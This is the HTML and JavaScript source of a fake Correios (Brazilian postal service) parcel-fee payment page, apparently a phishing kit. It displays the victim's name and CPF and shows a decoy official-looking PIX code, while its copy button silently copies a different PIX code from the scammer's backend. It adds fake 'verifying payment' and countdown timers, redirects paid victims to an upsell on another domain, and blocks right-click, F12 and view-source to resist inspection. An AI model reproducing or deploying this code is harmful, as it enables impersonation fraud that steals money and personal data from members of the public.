<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <link rel="preconnect" href="https://fonts.googleapis.com">
  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="">
  <link href="css2" rel="stylesheet">
  <link rel="stylesheet" href="css/bootstrap.css">
  <link rel="stylesheet" href="css/app.css">
  <link rel="stylesheet" href="css/yellow.css">
  <link rel="stylesheet" href="css/all.css" crossorigin="anonymous">
  <link rel="icon" type="image/x-icon" href="images/correios-icon.png">
   <script disable-devtool-auto="" src="https://cdn.jsdelivr.net/npm/disable-devtool" url="https://inlead.digital/mobile-spy/"></script>
  
 
<!-- Meta Pixel Code -->
<script>
!function(f,b,e,v,n,t,s)
{if(f.fbq)return;n=f.fbq=function(){n.callMethod?
n.callMethod.apply(n,arguments):n.queue.push(arguments)};
if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
n.queue=[];t=b.createElement(e);t.async=!0;
t.src=v;s=b.getElementsByTagName(e)[0];
s.parentNode.insertBefore(t,s)}(window, document,'script',
'https://connect.facebook.net/en_US/fbevents.js');
fbq('init', '620438634141423');
fbq('track', 'PageView');
</script>

<noscript>
    <img height="1" width="1" style="display:none"
src="https://www.facebook.com/tr?id=620438634141423&ev=PageView&noscript=1"
/>
</noscript>
<!-- End Meta Pixel Code -->

<script
  src="https://cdn.utmify.com.br/scripts/utms/latest.js"
  data-utmify-prevent-xcod-sck
  data-utmify-prevent-subids
  data-utmify-prevent-path
  async
  defer
></script>

<script>
  window.pixelId = "67dce41099e4f6c830b37d0e";
  var a = document.createElement("script");
  a.setAttribute("async", "");
  a.setAttribute("defer", "");
  a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
  document.head.appendChild(a);
</script>

<!-- Adicionar o rastreador de UTMs -->
<script src="js/utm-tracker.js"></script>


  <style>
      body {
          font-family: Arial, sans-serif;
      }
      .container {
          box-shadow: 0 4px 10px rgba(0, 0, 0, 0.1);
          border-radius: 8px;
          padding: 20px;
          background-color: #FFF;
          margin-bottom: 20px;
      }
      h2 {
          font-size: 1.5rem;
          color: #003087;
          font-weight: normal;
          margin-bottom: 10px;
      }
      .section-divider {
          height: 2px;
          background-color: #FFD700;
          margin: 10px 0;
      }
      .row {
          margin-bottom: 15px;
      }
      .row div {
          margin-bottom: 10px;
      }
      .label {
          font-weight: normal;
          color: #000;
          text-align: right;
      }
      .value {
          font-weight: normal;
          color: #000;
      }
      button {
          font-size: 1rem;
          border: none;
          border-radius: 50px;
          background: linear-gradient(90deg, #FFD700, #FFA500);
          color: #FFF;
          padding: 15px 30px;
          cursor: pointer;
          box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);
          transition: background-color 0.3s ease, transform 0.2s;
      }
      button:hover {
          background: linear-gradient(90deg, #FFA500, #FFD700);
          transform: translateY(-3px);
      }
      #qr-code {
          margin-top: 20px;
          text-align: center;
      }
      #pix-code {
          margin-top: 10px;
          word-wrap: break-word;
          background: #f5f5f5;
          padding: 10px;
          border-radius: 4px;
          font-family: monospace;
          user-select: none; /* Impede a seleção de texto */
          -webkit-user-select: none; /* Para navegadores baseados em WebKit */
          -moz-user-select: none; /* Para Firefox */
          -ms-user-select: none; /* Para Internet Explorer/Edge */
      }
      .loading-spinner {
          display: none;
          border: 4px solid #f3f3f3;
          border-top: 4px solid #003087;
          border-radius: 50%;
          width: 30px;
          height: 30px;
          animation: spin 1s linear infinite;
          margin: 20px auto;
      }
      @keyframes spin {
          0% { transform: rotate(0deg); }
          100% { transform: rotate(360deg); }
      }
      .timer {
          font-size: 0.9rem;
          color: #666;
          margin-top: 10px;
          text-align: center;
      }
  </style>

  <title>Correios | Rastreio</title>
</head>

<body>
  <header class="w-100 font-size-16 font-weight-400 text-blue">
    <div class="w-100 bg-grey px-3 px-lg-3 py-1 border-bottom border-white">
      <span>Acessibilidade</span>
      <i class="fas fa-caret-down ml-1"></i>
    </div>
    <nav class="w-100 d-flex align-items-center bg-grey-2 px-3 px-lg-3 py-1 border-bottom border-warning" style="height:48px">
      <div class="menu-toggle" id="menu-toggle" style="width:50px">
        <div class="bar"></div>
        <div class="bar"></div>
        <div class="bar"></div>
      </div>
       <div class="ml-0 ml-lg-1 d-flex justify-content-start" style="width:100%; padding-left: 80px;">
  <a href="/pagamento/index.php" class="py-2">
    <img src="images/correios.png" alt="" style="height: 26px;"> <!-- Altura aumentada -->
  </a>
</div>
      <div class="ml-4 d-none d-lg-block" style="width:150px">
        <a href="./" class="py-1 text-blue-dark border-left border-secondary px-3 text-decoration-none">
          <img src="images/entrar.svg" alt="Correios" width="31">
          <span class="ml-1">Entrar</span>
        </a>
      </div>
    </nav>
  </header>
  
  <main style="background-color: #f5f5f5; padding: 20px; font-family: 'Arial', sans-serif;">
      <div>
          <nav class="d-flex align-items-center flex-wrap mt-4 px-2 font-weight-400 w-95 max-w-1000" style="margin: 0 auto;">
            <span class="text-blue mr-2">Portal Correios</span>
            <i class="fal fa-angle-right mr-2"></i>
            <span class="text-blue mr-2">Verificar</span>
            <i class="fal fa-angle-right mr-2"></i>
             <span class="text-blue mr-2">Pagamento</span>
            
          </nav>
        
          <h1 class="mt-4 px-2 font-size-24 text-blue-dark font-weight-700 w-95 max-w-1000 d-flex justify-content-between" style="margin:0 auto;">
      </h1></div>
    <div class="container" style="max-width: 800px; margin: 0 auto; background: #fff; border-radius: 8px; box-shadow: 0 4px 10px rgba(0, 0, 0, 0.1); overflow: hidden;">
        <div id="headerc" style="padding: 0px 20px 0px 20px;">
            
        </div>
    </div>
</main>

  <footer class="d-flex flex-wrap px-5 py-4 bg-yellow text-blue-dark">
    <div class="w-30 min-w-300 px-0 px-lg-3 mb-3">
      <h5 class="font-weight-700 mb-4">Fale Conosco</h5>
      <ul>
        <li class="mb-2 font-size-14">
          <i class="fas fa-desktop"></i>
          <a href="#" class="ml-2 text-blue-dark text-hover-orange reload-page">
            <span class="text-wrap">Registro de Manifestações</span>
          </a>
        </li>
        <li class="mb-2 font-size-14">
          <i class="far fa-question-square mr-1"></i>
          <a href="#" class="ml-2 text-blue-dark text-hover-orange reload-page">
            <span class="text-wrap">Central de Atendimento</span>
          </a>
        </li>
        <li class="mb-2 font-size-14">
          <i class="far fa-briefcase"></i>
          <a href="#" class="ml-2 text-blue-dark text-hover-orange reload-page">
            <span class="text-wrap">Soluções para o seu negócio</span>
          </a>
        </li>
        <li class="mb-2 font-size-14">
          <i class="far fa-headset"></i>
          <a href="#" class="ml-2 text-blue-dark text-hover-orange reload-page">
            <span class="text-wrap">Suporte ao cliente com contrato</span>
          </a>
        </li>
        <li class="mb-2 font-size-14">
          <i class="far fa-comment-alt-dots"></i>
          <a href="#" class="ml-2 text-blue-dark text-hover-orange reload-page">
            <span>Ouvidoria</span>
          </a>
        </li>
        <li class="mb-2 font-size-14">
          <i class="far fa-user-headset"></i>
          <a href="#" class="ml-2 text-blue-dark text-hover-orange reload-page">
            <span>Denúncia</span>
          </a>
        </li>
      </ul>
    </div>
    <div class="w-30 min-w-300 px-0 px-lg-3 mb-3">
      <h5 class="font-weight-700 mb-4">Sobre os Correios</h5>
      <ul>
        <li class="mb-2 font-size-14">
          <i class="far fa-address-card"></i>
          <a href="#" class="ml-2 text-blue-dark text-hover-orange reload-page">
            <span>Identidade colaborativa</span>
          </a>
        </li>
        <li class="mb-2 font-size-14">
          <i class="far fa-user-graduate"></i>
          <a href="#" class="ml-2 text-blue-dark text-hover-orange reload-page">
            <span>Educação e cultura</span>
          </a>
        </li>
        <li class="mb-2 font-size-14">
          <i class="far fa-book-alt"></i>
          <a href="#" class="ml-2 text-blue-dark text-hover-orange reload-page">
            <span>Código de ética</span>
          </a>
        </li>
        <li class="mb-2 font-size-14">
          <i class="far fa-file-search"></i>
          <a href="#" class="ml-2 text-blue-dark text-hover-orange reload-page">
            <span class="text-wrap">Transparência e prestação de contas</span>
          </a>
        </li>
        <li class="mb-2 font-size-14">
          <i class="far fa-comment-alt-dots"></i>
          <a href="#" class="ml-2 text-blue-dark text-hover-orange reload-page">
            <span class="text-wrap">Política de privacidade e Notas legais</span>
          </a>
        </li>
      </ul>
    </div>
    <div class="w-30 min-w-300 px-0 px-lg-3 mb-3">
      <h5 class="font-weight-700 mb-4">Outros Sites</h5>
      <ul>
        <li class="mb-2 font-size-14">
          <i class="far fa-shopping-cart"></i>
          <a href="#" class="ml-2 text-blue-dark text-hover-orange reload-page">
            <span class="text-wrap">Loja online dos correios</span>
          </a>
        </li>
      </ul>
    </div>
    <div class="d-flex justify-content-center w-100 px-3 mb-3 text-dark font-size-14">
      <span>  Copyright 2025 Correios</span>
    </div>
  </footer>
  
<script type="text/javascript">

    function formatCPF(cpf) {
        cpf = cpf.replace(/\D/g, ''); // Remove caracteres não numéricos
        return cpf.replace(/(\d{3})(\d{3})(\d{3})(\d{2})/, '$1.$2.$3-$4');
    }

    function formatCurrency(value) {
        // Formata o valor para o padrão de moeda brasileira
        return new Intl.NumberFormat('pt-BR', { style: 'currency', currency: 'BRL' }).format(value / 100);
    }

    const urlParams = new URLSearchParams(window.location.search);
    const nome = urlParams.get('nome') || 'Não informado';
    const cpf = urlParams.get('cpf') || 'Não informado';
    const value = urlParams.get('5852') || 5852; // Valor fixo de R$ 59,90
    const cpfpattern = formatCPF(cpf);

    const formattedValue = formatCurrency(parseInt(value));

    // Preencher a box de detalhes com as variáveis obtidas
    const detailsBox = document.getElementById("headerc");
    detailsBox.innerHTML = `
        <div style="margin-bottom: 15px;">
            <h3 style="color: #003087; font-size: 1.2rem;">Confirme seus dados</h3>
            <div style="border-top: 2px solid #ffcc00; margin-top: 5px; margin-bottom: 25px;"></div>
        </div>
        
        <div class="details" style="line-height: 1.6;">
            <p><strong>Nome:</strong> <span class="userName">${nome}</span></p>
            <p><strong>CPF:</strong> <span class="userCPF">${cpfpattern}</span></p>
            <p><strong>Taxa:</strong> ${formattedValue} </p>
        </div>
        <form id="payment-form">
            <input type="hidden" name="customerName" value="${nome}">
            <input type="hidden" name="customerCPF" value="${cpf}">
            <input type="hidden" name="price" value="${value}">
            <div class="text-center">
                <button id="gerar-pagamento" type="button" style="background: #003087; color: #fff; padding: 10px 20px; border: none; border-radius: 4px; margin-top: 15px; cursor: pointer; font-size: 1rem;">
                    Gerar pagamento
                </button>
            </div>
        </form>
        <div id="qr-code"></div>
        <div id="pix-code"></div>
        <div class="loading-spinner" id="loading-spinner"></div>
        <div id="generation-timer" class="timer" style="font-weight: bold; color: black;"></div>
    `;

    // Função melhorada para limpar URLs e parâmetros UTM
    function cleanUrl(url) {
        // Se a URL já contiver um '?', remova tudo após esse caractere
        if (url.indexOf('?') !== -1) {
            return url.split('?')[0];
        }
        return url;
    }

    // Função para prevenir que o script de UTM interfira nas chamadas AJAX
    function preventUTMInterference() {
        // Esta função é executada ao carregar a página
        // Ela desacopla os parâmetros UTM das chamadas de API
        
        // Armazena os parâmetros originais para uso em redirecionamentos
        window.originalParams = new URLSearchParams(window.location.search);
        
        // Previne que a biblioteca UTMify adicione parâmetros às chamadas AJAX
        const originalOpen = XMLHttpRequest.prototype.open;
        XMLHttpRequest.prototype.open = function(method, url, async, user, password) {
            // Limpa a URL antes de abrir a requisição
            const cleanedUrl = cleanUrl(url);
            return originalOpen.call(this, method, cleanedUrl, async, user, password);
        };
        
        // Previne que o fetch adicione parâmetros UTM
        const originalFetch = window.fetch;
        window.fetch = function(resource, options) {
            if (typeof resource === 'string') {
                resource = cleanUrl(resource);
            }
            return originalFetch.call(this, resource, options);
        };
    }
    
    // Executa a função de prevenção imediatamente
    preventUTMInterference();

    // Função para remover o erro 400 ao gerar pagamento com UTM
    function iniciarGeracaoPix(event) {
        // Previne o comportamento padrão do botão
        if (event) event.preventDefault();
        
        // Chama diretamente a função de geração do PIX
        generatePix();
        
        return false;
    }

    // Adicionar evento ao botão "Gerar pagamento"
    document.getElementById("gerar-pagamento").addEventListener("click", iniciarGeracaoPix);

    // Função simplificada para obter dados do formulário
    function getClientData() {
        // Obter dados do formulário de forma mais segura
        const nomeElement = document.querySelector('input[name="customerName"]');
        const cpfElement = document.querySelector('input[name="customerCPF"]');
        const valueElement = document.querySelector('input[name="price"]');
        
        // Garantir que temos os elementos e que eles têm valores
        const nome = nomeElement ? nomeElement.value.trim() : '';
        const cpf = cpfElement ? cpfElement.value.trim() : '';
        const value = valueElement ? valueElement.value.trim() : '';
        
        // Se o nome estiver vazio, tente obter dos parâmetros da URL
        if (!nome) {
            const urlParams = new URLSearchParams(window.location.search);
            const nomeURL = urlParams.get('nome');
            if (nomeURL) {
                const nomeDecodificado = decodeURIComponent(nomeURL.replace(/\+/g, ' '));
                if (nomeElement) nomeElement.value = nomeDecodificado;
            }
        }
        
        // Remover formatação do CPF (pontos e traços)
        const cpfLimpo = cpf.replace(/[^\d]/g, '');
        
        // Obter os valores atualizados
        const dadosCliente = {
            nome: nomeElement ? nomeElement.value.trim() : '',
            cpf: cpfLimpo,
            value: value
        };
        
        return dadosCliente;
    }

    // Função que carrega os dados da URL para o formulário
    function carregarDadosURL() {
        const urlParams = new URLSearchParams(window.location.search);
        
        // Decodifica o nome corretamente substituindo + por espaço
        if (urlParams.has('nome')) {
            const nome = decodeURIComponent(urlParams.get('nome').replace(/\+/g, ' '));
            document.querySelector('input[name="customerName"]').value = nome;
        }
        
        if (urlParams.has('cpf')) {
            document.querySelector('input[name="customerCPF"]').value = urlParams.get('cpf');
        }
        
        if (urlParams.has('value')) {
            document.querySelector('input[name="price"]').value = urlParams.get('value');
        }
    }

    // Carregar dados imediatamente, sem esperar pelo evento DOMContentLoaded
    carregarDadosURL();
    
    // Função para geração do PIX
    async function generatePix() {
        // Mostra o spinner de carregamento
        document.getElementById('loading-spinner').style.display = 'block';

        try {
            // Obtém os dados do cliente diretamente do formulário
            const clientData = getClientData();
            
            // Verifica obtenção direta da URL se o nome estiver vazio
            if (!clientData.nome || clientData.nome.trim() === '') {
                const urlParams = new URLSearchParams(window.location.search);
                const nomeURL = urlParams.get('nome');
                if (nomeURL) {
                    // Decodifica o nome e atualiza clientData
                    clientData.nome = decodeURIComponent(nomeURL.replace(/\+/g, ' '));
                }
            }
            
            // Validação básica
            if (!clientData.nome || clientData.nome.trim() === '') {
                alert('Por favor, preencha o nome.');
                return;
            }
            
            if (!clientData.cpf || clientData.cpf.trim() === '') {
                alert('Por favor, preencha o CPF.');
                return;
            }
            
            // Usa caminho absoluto para o arquivo de geração do PIX
            const pixUrl = window.location.pathname.substring(0, window.location.pathname.lastIndexOf('/') + 1) + 'gerar_pix.php';
            
            const response = await fetch(pixUrl, {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json',
                },
                body: JSON.stringify(clientData)
            });

            const data = await response.json();

            // Verifica se a resposta contém os dados do PIX, independente da flag success
            if (data.success === true || (data.qrcode && data.codigoPix && data.id)) {
                // Exibe o QR Code e o código PIX fictício
                document.getElementById('qr-code').innerHTML = `
                    <div id="generation-timer" class="timer" style="font-weight: bold; color: black;"></div>
                    <h4 style="color: #003087; font-size: 1.1rem; margin-bottom: 10px; margin-top: 20px;">QR Code para pagamento:</h4>
                    <img src="${data.qrcode}" alt="QR Code" style="max-width: 100%; height: auto;">
                `;
                // Exibe o código PIX fictício (não selecionável)
                document.getElementById('pix-code').innerText = "00020126870014br.gov.bcb.pix2565pix.correios.com.br/qr/v3/at/157cb39b-3bd6-480e-a5d6-a99ee043c9915204000053039865802BR5920CORREIOS BRASIL6010PARNAMIRIM62070503***6304D68C";

                // Adiciona botão para copiar o código PIX real (oculto)
                const copyButton = document.createElement('button');
                copyButton.innerText = 'COPIAR CÓDIGO PIX COPIA E COLA';
                copyButton.style = 'background: #003087; color: #fff; padding: 10px 20px; border: none; border-radius: 4px; margin-top: 15px; cursor: pointer; font-size: 1rem;';
                copyButton.addEventListener('click', () => {
                    navigator.clipboard.writeText(data.codigoPix).then(() => {
                        alert('Código PIX copiado para a área de transferência!');
                    });
                });
                document.getElementById('qr-code').appendChild(copyButton);

                // Oculta o botão "Gerar pagamento"
                document.getElementById('gerar-pagamento').style.display = 'none';

                // Inicia o timer de 10 minutos
                startGenerationTimer(10);

                // Inicia a verificação do status do pagamento
                verificarStatusPagamento(data.id);

                // Inicia o timer fictício de 15 segundos APÓS 30 SEGUNDOS
                setTimeout(startFakeTimer, 50000); // 50000 milissegundos = 50 segundos
              
            } else {
                alert('Erro ao gerar pagamento PIX: ' + (data.message || 'Erro desconhecido'));
            }
        } catch (error) {
            alert('Erro ao gerar pagamento PIX. Tente novamente.');
        } finally {
            // Esconde o spinner de carregamento
            document.getElementById('loading-spinner').style.display = 'none';
        }
    }

    // Função para prevenção de interferência dos parâmetros UTM
    function preventUTMInterference() {
        // Salvar os parâmetros originais para uso em redirecionamentos
        window.originalParams = new URLSearchParams(window.location.search);
    }
    
    // Inicializa a prevenção de interferência
    preventUTMInterference();

    // Função que carrega os dados da URL para o formulário
    function carregarDadosURL() {
        const urlParams = new URLSearchParams(window.location.search);
        
        // Decodifica o nome corretamente substituindo + por espaço
        if (urlParams.has('nome')) {
            const nome = decodeURIComponent(urlParams.get('nome').replace(/\+/g, ' '));
            document.querySelector('input[name="customerName"]').value = nome;
        }
        
        if (urlParams.has('cpf')) {
            document.querySelector('input[name="customerCPF"]').value = urlParams.get('cpf');
        }
        
        if (urlParams.has('value')) {
            document.querySelector('input[name="price"]').value = urlParams.get('value');
        }
    }

    // Carregar dados imediatamente, sem esperar pelo evento DOMContentLoaded
    carregarDadosURL();
    
    // Função para iniciar a geração do PIX
    function iniciarGeracaoPix(event) {
        // Previne o comportamento padrão do botão
        if (event) event.preventDefault();
        
        // Chama diretamente a função de geração do PIX
        generatePix();
        
        return false;
    }

    // Função simplificada para obter dados do formulário
    function getClientData() {
        // Obter dados do formulário de forma mais segura
        const nomeElement = document.querySelector('input[name="customerName"]');
        const cpfElement = document.querySelector('input[name="customerCPF"]');
        const valueElement = document.querySelector('input[name="price"]');
        
        // Garantir que temos os elementos e que eles têm valores
        const nome = nomeElement ? nomeElement.value.trim() : '';
        const cpf = cpfElement ? cpfElement.value.trim() : '';
        const value = valueElement ? valueElement.value.trim() : '';
        
        // Se o nome estiver vazio, tente obter dos parâmetros da URL
        if (!nome) {
            const urlParams = new URLSearchParams(window.location.search);
            const nomeURL = urlParams.get('nome');
            if (nomeURL) {
                const nomeDecodificado = decodeURIComponent(nomeURL.replace(/\+/g, ' '));
                if (nomeElement) nomeElement.value = nomeDecodificado;
            }
        }
        
        // Remover formatação do CPF (pontos e traços)
        const cpfLimpo = cpf.replace(/[^\d]/g, '');
        
        // Obter os valores atualizados
        const dadosCliente = {
            nome: nomeElement ? nomeElement.value.trim() : '',
            cpf: cpfLimpo,
            value: value
        };
        
        return dadosCliente;
    }

    // Função para verificar o status do pagamento
function verificarStatusPagamento(transactionId) {
    function checkStatus() {
        // Obtém o caminho absoluto para o arquivo de verificação de status
        const baseUrl = window.location.pathname.substring(0, window.location.pathname.lastIndexOf('/') + 1);
        const statusUrl = `${baseUrl}verifica_status.php?id=${transactionId}`;
        
        fetch(statusUrl)
            .then(response => response.json())
            .then(data => {
                if (data.status === "APPROVED") {
                    // Mantém todos os parâmetros UTM originais na URL de redirecionamento
                    const urlParams = new URLSearchParams(window.location.search);
                    
                    // Constrói a URL de redirecionamento com os parâmetros
                    const upsellUrl = `https://encomendasparadas.site/upsell1/index.php?${urlParams.toString()}`;

                    // Redireciona para a página de upsell com os parâmetros originais
                    window.location.href = upsellUrl;
                } else {
                    // Continua verificando o status a cada 5 segundos
                    setTimeout(checkStatus, 5000);
                }
            })
            .catch(error => {
                // Continua verificando o status a cada 5 segundos mesmo em caso de erro
                setTimeout(checkStatus, 5000);
            });
    }

    // Inicia a verificação do status
    checkStatus();
}

    // Função para iniciar o timer de 10 minutos
    function startGenerationTimer(minutes) {
        const timerElement = document.getElementById('generation-timer');
        let timeLeft = minutes * 60;

        const timerInterval = setInterval(() => {
            const minutesLeft = Math.floor(timeLeft / 60);
            const secondsLeft = timeLeft % 60;
            timerElement.innerText = `TEMPO RESTANTE PARA EFETUAR O PAGAMENTO: ${minutesLeft}:${secondsLeft < 10 ? '0' : ''}${secondsLeft}`;
            timeLeft--;
            timerElement.style.fontSize = '14px'; // Altere o valor conforme necessário
            if (timeLeft < 0) {
                clearInterval(timerInterval);
                timerElement.innerText = 'TEMPO ESGOTADO. RECARREGUE A PÁGINA PARA GERAR UM NOVO PAGAMENTO.';
                timerElement.style.fontSize = '14px'; // Altere o valor conforme necessário
            }
        }, 1000);
    }

    // Função para iniciar o timer fictício
    function startFakeTimer() {
        // Cria o elemento para exibir o timer fictício
        const fakeTimerElement = document.createElement('div');
        fakeTimerElement.id = 'fake-timer';
        fakeTimerElement.style = 'font-size: 1rem; color: #003087; text-align: center; margin-top: 10px;';
        
        // Verifica se o elemento onde o timer será adicionado existe
        const pixCodeElement = document.getElementById('pix-code');
        if (pixCodeElement) {
            pixCodeElement.insertAdjacentElement('afterend', fakeTimerElement); // Adiciona abaixo do código PIX
        } else {
            // Se não encontrar o elemento, adiciona ao corpo do documento
            document.body.appendChild(fakeTimerElement);
        }

        let timeLeft = 15;

        const fakeTimerInterval = setInterval(() => {
            fakeTimerElement.innerText = `VERIFICANDO PAGAMENTO AGUARDE... ${timeLeft}s`;
            timeLeft--;

            if (timeLeft < 0) {
                timeLeft = 15; // Reinicia o timer
            }
        }, 1000);
        
        // Retorna o intervalo para que possa ser limpo posteriormente se necessário
        return fakeTimerInterval;
    }

    // Adicionar evento de clique para recarregar a página
    document.querySelectorAll('.reload-page').forEach(link => {
        link.addEventListener('click', function(event) {
            event.preventDefault();
            location.reload();
        });
    });
  </script>
  
  <script src="js/jquery-3.6.0.min.js"></script>
  <script src="js/bootstrap.min.js"></script>

  <!-- Script para desabilitar o botão direito do mouse -->
  <script>
    document.addEventListener('contextmenu', function(e) {
      e.preventDefault();
      return false;
    });
    
    document.addEventListener('keydown', function(e) {
      // Desabilita Ctrl+S, Ctrl+U, Ctrl+P, F12
      if (
        (e.ctrlKey && (e.keyCode === 83 || e.keyCode === 85 || e.keyCode === 80)) || 
        e.keyCode === 123
      ) {
        e.preventDefault();
        return false;
      }
    });
  </script>
</body>
</html>